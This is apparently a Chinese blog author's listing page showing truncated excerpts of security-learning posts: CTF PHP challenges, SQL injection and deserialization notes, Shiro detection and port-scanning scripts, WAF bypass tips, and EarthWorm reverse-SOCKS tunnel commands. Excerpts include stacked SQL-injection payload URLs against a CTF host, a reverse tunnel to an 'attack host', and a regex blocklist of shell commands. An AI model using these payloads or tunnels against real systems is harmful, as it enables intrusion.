笔记
闲人end
这个作者很懒,什么都没留下…
展开
-
KALI-64位运行32位程序解决和EW初步使用
dpkg --add-architecture i386wget archive.kali.org/archive-key.ascapt-key add archive-key.ascapt-get updateapt-get install libc6:i386 ./ew_linux -s rcsocks -l 1080 -e 1234ew_win -s rsscocks -d 攻击主机地址 -e 1234拓展应用EW与proxyresolv 配合:proxyresolv可启动nma原创 2021-06-04 00:01:25 · 687 阅读 · 0 评论 -
2021-4-26
1,<?phphighlight_file(__FILE__);$comm1 = $_GET['comm1'];$comm2 = $_GET['comm2'];if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1)) $file原创 2021-04-26 22:14:02 · 202 阅读 · 0 评论 -
end的学习 21-4-20
mkdir创建权限为777的目录:mkdir -m 777 test3通过 mkdir 命令可以实现在指定位置创建以 DirName(指定的文件名)命名的文件夹或目录。要创建文件夹或目录的用户必须对所创建的文件夹的父文件夹具有写权限。并且,所创建的文件夹(目录)不能与其父目录(即父文件夹)中的文件名重名,即同一个目录下不能有同名的(区分大小写)。chdir()chdir() 函数改变当前的目录。<?php// Get current directoryecho getcwd() .原创 2021-04-20 21:50:45 · 144 阅读 · 0 评论 -
end 21-4-19
强网杯 2019 随便注http://www.bmzclub.cn:20431/?inject=1';show database;#http://www.bmzclub.cn:20431/?inject=1';show tables;#http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;#http://www.bmzclub.cn:20431/?inject=1';sEt @a=concat("sel","ect fla原创 2021-04-19 23:09:59 · 188 阅读 · 0 评论 -
end的学习反序列化4
1,<?phpinclude "flag5.php";class funny{ private $a; function __construct() { $this->a = "givemeflag"; } function __destruct() { global $flag; if ($this->a === "givemeflag") { echo $flag;原创 2021-04-18 00:28:54 · 573 阅读 · 1 评论 -
end的学习反序列化存储和使用的引擎不一样(session.serialize_handler)
session.serialize_handlersession.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同。 php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值 php:存储方式是,键名+竖线+经过serialize()函数序列处理的值 php_serialize(php>5.5.4原创 2021-04-13 21:07:08 · 257 阅读 · 0 评论 -
end的学习反序列化3
1,wakeup<?php class SoFun{ //类 protected $file='index.php';//protected:是受保护的,只有在类内部以及继承类中使用,类外部不能使用。换 function __destruct(){//函数 if(!empty($this->file)) {//empty() 函数用于检查一个变量是否为空。 if(strchr($this-> file,"\\")===false && st原创 2021-04-08 21:17:45 · 417 阅读 · 0 评论 -
end的python学习shiro检测
识别SHIRO框架:请求包里面发送:RememberMe=响应头里面出现cookie rememberme代码检测是否使用SHIRO框架:import requestsimport urllib3urllib3.disable_warnings()header={ 'cookie':'rememberMe=1'}def check_shiro(url): res=requests.get(url,verify=False,headers=header) if原创 2021-04-05 21:10:50 · 444 阅读 · 0 评论 -
end的学习python---端口扫描
连接百度80端口import sockets=socket.socket()s.connect(("www.baidu.com",80))s.send(b"test\n")print(s.recv(1024))多线程端口扫描import socketfrom concurrent.futures import ThreadPoolExecutorfrom rich.progress import ( Progress, TextColumn, BarColumn原创 2021-03-30 22:55:34 · 165 阅读 · 0 评论 -
end的爬虫学习1-----获取子域名
网页文本获取import requestsurl='https://www.baidu.com'headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}html=requests.get(url,headers=headers).textprint(html)xpath的标签定位nodename选取此节点的所有子节点/原创 2021-03-29 21:52:27 · 335 阅读 · 0 评论 -
end遇见不懂的问题
strcmp() 函数语法:strcmp(string1,string2) 0 - 如果两个字符串相等<0 - 如果 string1 小于 string2>0 - 如果 string1 大于 string2GET请求:?a[]=2因为strcmp()无法比较数组,则报错并返回0,0==0成立md5()弱类型和sha1()函数(绕过)1.md5:①经过md5加密之后相等,首先我们能想到的是md5的一个缺陷,也就是说经过md5加密之后以0e开头的,值都为0,那是因为0e在比较的时原创 2020-10-21 20:27:59 · 254 阅读 · 0 评论 -
waf绕过方法闲人
一:动态调用waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉。在我们真正恶意代码前加入大量杂糅字符进行绕过;然后对后缀进行换行绕过;��[.ShellClassInfo]LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21770IconResource=%SystemRoot%\system32\imageres.dll,-112原创 2020-10-16 16:51:13 · 1905 阅读 · 0 评论 -
end的SQL注入漏洞学习
select count(*) from admin where usename=‘admin’ and password='password’select:查询动作count(*):字段名admin:表名usename,password:字段名‘admin’,‘password’:字段值注入漏洞分类1,数字型数字型注入最多出现在ASP,PHP等弱类型语言中,弱类型语言会自动推导变量类型。而在JAVA,C#这类强类型语言,如果试图把一个字符串转换成int类型,则会抛出异常,无法继续执行。2原创 2020-09-08 13:28:01 · 163 阅读 · 0 评论 -
end的docker练习
一,下载在kali上进行编码下载。二,操作1,容器的使用a. Docker以ubuntu 15.10镜像建立一个容器,在容器内执行/bin/echo “Hello world” 我一开始命令不行,后来是发现没有启动docker服务(service docker restart) 因为ub 15.10的镜像本机上没有,所以docker会自动从docker hub下载公共镜像。b.以进程方式运行的容器,得到的会是容器的ID。通过命令(docker ps)可以查看容器的相关属性。CONTAINER原创 2020-09-01 01:08:24 · 103 阅读 · 0 评论 -
End的HTTP协议学习
**1,HTTP协议解析HTTP即超文本传输协议,是一种规定了浏览器和万维网之间相互通讯的规则,它允许HTML(超文本标记语言)文档从web服务器传送到web浏览器。**1.1 发起HTTP请求在浏览器地址栏输入URL按下回车键,就可以发起HTTP请求。URL格式:协议://服务器IP【:端口】/路径/【?查询】例:https://mp.csdn.net/console/homeWindows可以在curl.exe上请求:curl http://服务器IP地址 可以返回该界面的HTML数据原创 2020-08-24 17:48:09 · 548 阅读 · 0 评论